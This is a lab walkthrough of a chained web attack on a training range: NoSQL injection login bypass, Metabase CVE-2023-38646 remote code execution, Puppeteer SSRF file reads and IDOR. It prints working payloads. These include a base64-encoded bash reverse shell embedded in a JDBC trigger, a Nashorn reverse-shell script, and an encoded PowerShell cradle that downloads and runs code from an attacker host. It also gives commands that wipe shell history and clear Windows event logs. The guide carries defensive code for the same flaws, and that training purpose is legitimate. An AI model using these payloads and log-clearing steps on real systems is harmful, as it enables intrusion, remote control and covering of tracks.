CVE‑2023‑38646, NoSQLi, SSRF & IDOR: Real‑World Multi‑Tenant Web Exploitation Chain – Hands‑On Lab Guide

Introduction

Modern web applications rarely fall to a single, isolated bug. Real‑world compromise almost always involves chaining seemingly minor flaws – an authentication bypass that leaks credentials, a configuration weakness that permits remote code execution, and an internal pivot that exposes sensitive data. This article breaks down a realistic beginner‑to‑intermediate web range that chains six flags across a multi‑tenant property platform, covering NoSQL injection (NoSQLi), Metabase pre‑auth RCE (CVE‑2023‑38646), plaintext credential exposure, SSRF through a Puppeteer PDF microservice, and IDOR on a tenant portal.

Learning Objectives

Exploit a NoSQL injection to bypass authentication and gain initial access.
Trigger Metabase CVE‑2023‑38646 – understand why a JDBC `CREATE TRIGGER` with Nashorn JavaScript gives you pre‑auth RCE, rather than just running a public exploit.
Perform server‑side request forgery (SSRF) via a PDF generation service to read local source code, identify a hidden internal API, and pivot through it.

You Should Know

1. The Complete Exploitation Chain – From Public Facing Endpoint to Internal API

The range simulates a realistic multi‑tenant property platform. Each vulnerability feeds into the next, making the chain feel purposeful rather than arbitrary. Below is the walkthrough that mimics a real penetration test.

Step 1 – NoSQL Injection to Bypass Authentication

Many modern applications use MongoDB with dynamic query objects. The vulnerable login endpoint passes unsanitised user input directly into the query.

Vulnerable code example (Node.js + Mongoose):

app.post('/login', async (req, res) => {
  // Vulnerable: the request body values go straight into the query filter,
  // so an object such as { "$ne": null } is interpreted as a MongoDB operator
  // instead of being compared as a literal string.
  const user = await db.users.findOne({
    email: req.body.email,
    password: req.body.password
  });
  // …
});

An attacker can inject MongoDB operators:

{
  "email": { "$ne": null },
  "password": { "$ne": null }
}

This returns the first user in the collection – effectively bypassing the password check. Many public APIs also allow parameter pollution: `email[$ne]=` or `password[$regex]=.` to achieve the same result.
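The hardened counterpart of the login handler above, as an added example that is not code from the original article: credentials are forced to be plain strings before they reach MongoDB, so operator objects such as `{ "$ne": null }` and the query‑string pollution form `email[$ne]=` are rejected with a 400 instead of matching the first user. `db.users.findOne()` and Express are assumed, as in the original snippet.

```javascript
// Added example (not from the original article): type-check credentials so
// MongoDB operators can never be smuggled into the findOne() filter.

function isPlainString(value) {
  return typeof value === "string" && value.length > 0;
}

// Builds the findOne() filter or throws; objects, arrays and numbers never pass.
function buildLoginQuery(body) {
  if (!isPlainString(body.email) || !isPlainString(body.password)) {
    throw new TypeError("email and password must be non-empty strings");
  }
  return { email: body.email, password: body.password };
}

// Classifies a request body the way the route will: "accepted" or "rejected".
// qs-style parsers turn "email[$ne]=" into { email: { $ne: "" } }, which is rejected.
function classifyLoginBody(body) {
  try {
    buildLoginQuery(body || {});
    return "accepted";
  } catch (_e) {
    return "rejected";
  }
}

// Route handler. In a real app the stored password is a hash checked with
// bcrypt.compare(), not a literal filter value as in the original snippet.
function makeLoginHandler(db) {
  return async function login(req, res) {
    let query;
    try {
      query = buildLoginQuery(req.body || {});
    } catch (err) {
      return res.status(400).json({ error: err.message });
    }
    const user = await db.users.findOne(query);
    if (!user) return res.status(401).json({ error: "invalid credentials" });
    return res.json({ ok: true, userId: user._id });
  };
}
// Wiring (assumed Express app): app.post('/login', makeLoginHandler(db));
```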

Step 2 – Pre‑Auth Remote Code Execution via Metabase (CVE‑2023‑38646)

After gaining a low‑privileged foothold, you discover that an internal instance of Metabase (a business intelligence tool) is exposed. Metabase versions before a certain patch are vulnerable to CVE‑2023‑38646 – a pre‑authentication RCE caused by improper JDBC connection string handling on the endpoint /api/setup/validate.

The vulnerability allows an attacker to craft a malicious H2 database connection URL that includes a `CREATE TRIGGER` statement with Nashorn JavaScript. The trigger executes arbitrary operating system commands when the JDBC connection is established.

Example exploitation steps:

  1. Set up a netcat listener on your attack machine:

    nc -lvnp 4444

  2. Send a POST request to `/api/setup/validate` with a payload similar to:

    {
      "details": {
        "db": "h2:mem:;MODE=MSSQL;TRACE_LEVEL_SYSTEM_OUT=1\;CREATE TRIGGER shellcmd BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC9Zb3VySVAvNDQ0NCAwPiYxJ30=}|{base64,-d}|{bash,-i}')\n$$"
      },
      "engine": "h2"
    }

    (The base64‑encoded string is bash -c 'bash -i >& /dev/tcp/YourIP/4444 0>&1'.)

Understanding the `CREATE TRIGGER` with Nashorn JavaScript is the key – you are not simply running a public script; you are learning how JDBC drivers can be subverted.
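A log‑side detector for attempts of this kind, added here as an example and not code from the original article or from Metabase: it parses POST bodies sent to /api/setup/validate and flags H2 connection strings that smuggle SQL or Nashorn script, the shape of the payload shown above. The log entry fields (src, method, path, body) and the sample entries are constructed for this example.

```javascript
// Added detection example (not from the original article).
const MARKERS = [
  /create\s+trigger/i,      // trigger definition appended to the JDBC URL
  /\/\/javascript/i,        // Nashorn source header inside $$ ... $$
  /runtime\.getruntime/i,   // JVM process spawn from the trigger body
  /;\s*init\s*=/i,          // H2 INIT= also runs SQL at connect time
];

// Inspects one log entry; returns null for requests to other endpoints.
function inspectValidateRequest(entry) {
  if (entry.method !== "POST" || !entry.path.startsWith("/api/setup/validate")) return null;
  let body;
  try {
    body = JSON.parse(entry.body);
  } catch (_e) {
    return { src: entry.src, verdict: "malformed-json", hits: [] };
  }
  const details = (body && body.details) || {};
  const db = String(details.db || "");
  const hits = MARKERS.filter((re) => re.test(db)).map((re) => re.source);
  if (hits.length > 0) return { src: entry.src, verdict: "cve-2023-38646-attempt", hits };
  // Any H2 URL carrying extra ';'-separated settings deserves review even without a known marker.
  if (body && body.engine === "h2" && db.includes(";")) return { src: entry.src, verdict: "review", hits };
  return { src: entry.src, verdict: "benign", hits };
}

// Constructed sample log (not real traffic); the trigger body is redacted.
const SAMPLE_LOG = [
  { src: "203.0.113.7", method: "POST", path: "/api/setup/validate",
    body: JSON.stringify({ engine: "h2", details: { db:
      "h2:mem:;MODE=MSSQL;TRACE_LEVEL_SYSTEM_OUT=1;CREATE TRIGGER x BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript REDACTED$$" } }) },
  { src: "192.0.2.10", method: "POST", path: "/api/setup/validate",
    body: JSON.stringify({ engine: "postgres", details: { host: "db.internal", dbname: "metabase" } }) },
  { src: "198.51.100.3", method: "GET", path: "/api/health", body: "" },
];

// Returns only the entries that need analyst attention.
function scanLog(entries) {
  return entries.map(inspectValidateRequest).filter((r) => r && r.verdict !== "benign");
}
```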

Step 3 – Pivot Using SSRF via the PDF Microservice

After gaining a shell on the Metabase host, you enumerate the internal network and find a PDF generation service powered by Puppeteer. The service allows users to submit HTML that is converted to PDF, but it does not properly sanitise input, leading to server‑side request forgery (SSRF) and local file disclosure.

SSRF exploitation steps:

<img src="file:///etc/passwd" />

When the headless browser renders this HTML, it requests `file:///etc/passwd` from the server's own filesystem and embeds the result into the PDF. The same primitive also reveals a hidden internal API endpoint that the gateway deliberately hides from external access.

Step 4 – Read Internal Source Code via file:// and Pivot

Using the SSRF primitive, read the source code of the internal API:

<img src="file:///var/www/internal-api/index.js" />

Within the source code you discover a secret token and an endpoint that allows tenant data manipulation without any ownership verification – a classic Insecure Direct Object Reference (IDOR).
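A request policy for the Puppeteer PDF renderer that closes both Step 3 and Step 4, added here as an example and not code from the original article or the lab: it blocks every non‑http(s) scheme (so `<img src="file:///...">` never reaches the filesystem) and http(s) requests to loopback, link‑local and RFC 1918 addresses, and can enforce an allowlist of external hosts. `attachRequestFilter()` is an assumed helper name; `page.setRequestInterception()` and `request.abort()` are Puppeteer's own API.

```javascript
// Added example (not from the original article): egress policy for the headless browser.
const IPV4 = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

function isInternalIPv4(host) {
  const m = IPV4.exec(host);
  if (!m) return false;
  const a = Number(m[1]);
  const b = Number(m[2]);
  return a === 0 || a === 10 || a === 127 || (a === 169 && b === 254) ||
         (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

// Returns true when the renderer may fetch this URL. allowedHosts, when given,
// restricts http(s) fetches to exactly those hostnames (e.g. a CDN for fonts/CSS).
function isAllowedUrl(raw, allowedHosts) {
  let url;
  try {
    url = new URL(raw);
  } catch (_e) {
    return false;
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false; // no file:, data:, ftp:
  const host = url.hostname.toLowerCase();
  if (host === "localhost" || host.endsWith(".localhost")) return false;
  if (host.includes(":")) return false;      // IPv6 literal such as [::1]: deny outright
  if (isInternalIPv4(host)) return false;    // WHATWG URL parsing has already normalised the address
  if (allowedHosts && !allowedHosts.has(host)) return false;
  return true;
}

// Wires the policy into a Puppeteer Page via request interception.
async function attachRequestFilter(page, allowedHosts) {
  await page.setRequestInterception(true);
  page.on("request", (req) => {
    if (isAllowedUrl(req.url(), allowedHosts)) req.continue();
    else req.abort("blockedbyclient");
  });
}
```

A hostname check alone does not stop a public name that resolves to an internal address (DNS rebinding), so the browser process should additionally run behind an egress firewall or in a network namespace with no route to the internal API.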

Step 5 – IDOR on the Tenant Portal

The internal API uses numeric tenant IDs in the URL path or query string:

GET /api/tenants/12345/reports

By changing the ID to 12346, you access another tenant’s reports. Many multi‑tenant applications fail to enforce proper access controls at the API layer, trusting that the client will never modify identifiers.
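Object‑level authorisation for the report endpoint above, as an added example that is not code from the original article: the tenant id in the path is treated as a claim to be verified against the caller's session, never as proof of access. The session shape, the membership store and the sample data are constructed for this example.

```javascript
// Added example (not from the original article): enforce tenant ownership server-side.

// Constructed membership data: which authenticated user may read which tenant.
const MEMBERSHIPS = new Map([
  ["user-alice", new Set([12345])],
  ["user-bob", new Set([12346])],
  ["user-admin", new Set([12345, 12346])],
]);

// The check is keyed on the server-side session, not on anything the client sent.
function canReadTenant(session, tenantId) {
  if (!session || !session.userId) return false;
  const allowed = MEMBERSHIPS.get(session.userId);
  return allowed !== undefined && allowed.has(tenantId);
}

// Parses the path id strictly: "12346" passes, "12346abc", "1e4" and "" do not.
function parseTenantId(raw) {
  return /^\d{1,12}$/.test(raw) ? Number(raw) : null;
}

// Handler for GET /api/tenants/:id/reports. It returns { status, body } so it can
// be unit-tested without Express; the route would just forward these to res.
function getTenantReports(req, reportsByTenant) {
  const tenantId = parseTenantId(req.params.id);
  if (tenantId === null) return { status: 400, body: { error: "bad tenant id" } };
  if (!canReadTenant(req.session, tenantId)) {
    // 404 rather than 403 so the caller cannot confirm which tenant ids exist.
    return { status: 404, body: { error: "not found" } };
  }
  return { status: 200, body: reportsByTenant.get(tenantId) || [] };
}
```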

Step 6 – Extract Plaintext Credentials from the Database

During earlier reconnaissance, you discovered a notes table in the application's database that stores sensitive information in plaintext – including administrator credentials. Querying this table (via the SQL injection gained from the IDOR) provides the final flag.

Step 7 – Full Chain Cleanup and Persistence

After obtaining full control, always consider operational security. For Linux targets:

# Remove uploaded tools and clear logs
rm -rf /tmp/.exploit
cat /dev/null > ~/.bash_history && history -c

For Windows targets:

# Clear PowerShell history and remove artefacts
Remove-Item (Get-PSReadlineOption).HistorySavePath
Clear-EventLog -LogName Application, System, Security

2. Troubleshooting Reverse Shells – Common Pitfalls and Fixes

During the range, reverse shell troubleshooting often teaches more than the flag submission itself. Here are the most frequent issues and their solutions.

Issue 1 – Wrong VPN IP

Always verify your attacker machine’s IP address inside the lab environment:

ip addr show tun0

If your VPN interface is tun0, ensure the payload uses that address, not your local network IP.

Issue 2 – Trigger Name Collisions in JDBC

When exploiting CVE‑2023‑38646, you must use a unique trigger name. If the name already exists in the H2 database, the `CREATE TRIGGER` fails silently.

Fix: Use randomised names:

TRIGGER_NAME=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1)

Then embed `${TRIGGER_NAME}` in the JSON payload.

Issue 3 – Nashorn JavaScript Execution Quirks

The Nashorn engine (used in Java 8 to 14) has subtle differences compared to a normal Bash shell. For example:

Use `java.lang.Runtime.getRuntime().exec('command')` rather than `exec('command')`.

Command arguments must be passed as an array: `.exec(new String[]{"bash", "-c", "echo test"})`.

Environment variables are not inherited by default.

A reliable payload that writes a reverse shell script and executes it:

java.lang.Runtime.getRuntime().exec(new String[]{"bash", "-c", "echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.10.10.10/4444 0>&1' > /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh"});

Issue 4 – PowerShell Reverse Shell Not Working on Windows

If the target is Windows, use a base64‑encoded PowerShell one‑liner to avoid quotation mark issues:

powershell -NoP -NonI -W Hidden -Exec Bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQAwAC4AMQAwADoAOAAwADgAMAAvAHIAZQB2AGUAcgBzAGUALgBwAHMAMQAnACkA

Decode the string to see the original command:

IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/reverse.ps1')

Issue 5 – Interactive Shell Stabilisation

A basic netcat reverse shell is often unstable. Upgrade it to a fully interactive TTY:

# On target (after catching the shell)
python3 -c 'import pty; pty.spawn("/bin/bash")'
# On attacker machine (after catching the shell)
stty raw -echo; fg

What Undercode Says

Multi‑vector chaining is the new standard – isolated vulnerabilities are increasingly rare, and realistic ranges that force learners to pivot from NoSQLi to SSRF to IDOR are essential for modern security training.
Understanding why a vulnerability works, not just how to exploit it, separates script kiddies from analysts. The Metabase JDBC trigger with Nashorn is a perfect example of a flaw that requires reading the actual vulnerability write‑up, not just running a PoC.

The gap between “entry‑level” and “intermediate” is precisely this friction – when a simple VPN misconfiguration or a trigger name collision breaks your exploit, you are forced to understand the underlying mechanics. Ranges that intentionally introduce this friction are far more valuable than those where every flag falls after a single predictable command.

Prediction

Expect an increase in "hardened" multi‑tenant applications that still expose legacy API endpoints, especially PDF generation services. Puppeteer SSRF will become a top‑five cloud vulnerability by 2027 as more organisations adopt headless browser automation without proper network sandboxing.

Open‑source exploit chaining frameworks will emerge, integrating scanners for NoSQLi, JDBC RCE, and SSRF into a single pipeline. This will lower the barrier for blue teams to reproduce complex attack chains, leading to better defensive automation.

The move to serverless and microservice architectures will exacerbate IDOR risks, because developers often assume that function‑level permissions are enough and neglect object‑level checks across different services.

Reported By: Shaheer Yasir – Hackers Feeds